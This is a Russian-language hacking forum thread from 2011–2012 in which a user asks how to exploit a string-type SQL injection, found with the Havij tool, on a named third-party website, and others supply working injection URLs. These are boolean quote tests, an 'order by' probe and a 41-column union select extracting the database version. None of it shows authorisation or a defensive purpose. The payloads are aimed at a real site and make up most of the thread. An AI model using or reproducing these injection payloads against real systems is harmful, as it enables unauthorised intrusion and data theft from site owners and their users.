SQL-инъекция в STRING-параметр
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
SQL-инъекция в STRING-параметр - 2011-10-24 17:00:49.296666
|
|
|
GothX
Сообщений: 263
Оценки: 20
Присоединился: 2011-06-22 13:27:08.173333
|
Вобщем. проблема опять с SQL-инъектами.
Хавиж определяет тип инъекции как "String(')"
С INTEGER-типом всё легко, а как быть с такой шляпой?
Вот ссылка на инъект:
http://www.multikov.net/user.php?iduser=3000295
Помогите, пожалуйста, очень надо
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-10-24 20:02:32.600000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Прога как бы намекает, что в запросе нужно использовать кавычку…
http://www.multikov.net/user.php?iduser=3000295'+and+1=1– 1
http://www.multikov.net/user.php?iduser=3000295'+and+1=0– 1
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-10-24 20:38:44.763333
|
|
|
GothX
Сообщений: 263
Оценки: 20
Присоединился: 2011-06-22 13:27:08.173333
|
Да намек-то я как бы понял, но как сформировать полноценный SQL-запрос? Я сколько ни экспериментировал, ничего не получилось, даже гуголь отказался мне помогайтен
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-10-25 04:52:39.883333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
А выше не полноценные запросы?
http://www.multikov.net/user.php?iduser=3000295'+order+by+1– 1
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-10-26 18:27:34.793333
|
|
|
GothX
Сообщений: 263
Оценки: 20
Присоединился: 2011-06-22 13:27:08.173333
|
Ну я почему-то не могу сформировать запрос.. Чтобы узнать версию, например)
Видимо, пора завязывать с пьянкой
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-10-26 19:40:01.790000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://www.multikov.net/user.php?iduser=-3000295'+union+select+1,2,3,4,version(),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41– 1
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-11-20 13:00:09.046666
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
r1dex
+ в конце забыл поставить)
http://www.multikov.net/user.php?iduser=-3000295'+union+select+1,2,3,4,version(),6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41–+
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-11-20 13:32:38.833333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
эм… смотри внимательнее )
….. ,38,39,40,41– 1
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2011-11-21 10:50:30.260000
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
Сорри) просмотрел, каюсь)
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2012-01-28 06:19:50.910000
|
|
|
fox*card
Сообщений: 127
Оценки: 0
Присоединился: 2012-01-13 19:26:21.763333
|
запросы меняй разные
|
|
|
|
|
RE: SQL-инъекция в STRING-параметр - 2012-02-03 07:55:52.186666
|
|
|
Сaptain T0ma5o
Сообщений: 66
Оценки: 0
Присоединился: 2011-10-21 10:42:18.486666
|
Да убейте уже тему, тремя постами выше написан валидный запрос.
|
|
|
|
|
|
